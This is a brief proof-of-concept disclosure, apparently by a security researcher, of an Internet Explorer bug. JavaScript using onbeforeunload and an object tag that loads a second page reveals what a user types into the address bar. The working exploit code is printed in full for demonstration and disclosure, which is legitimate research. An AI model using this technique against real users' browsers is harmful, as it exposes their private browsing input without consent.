Information Disclosure on IE
Reveal what the user types into the address-bar

PROOF OF CONCEPT With the help of an html/object tag, we can know what the user types into the address bar.

Come on! Type anything into the address bar and press [ENTER]


-------- MAIN PAGE --------

window.onbeforeunload = function()
{
  document.write('<object data="loc.html" type="text/html"></object>');
  document.close();
}

---------- loc.html ----------

document.write(location.href); // returns address bar content



Blog: Revealing the content of the address bar on IE

Video: Revealing the content of the address bar on IE

Contact: Manuel Caballero || @magicmac2000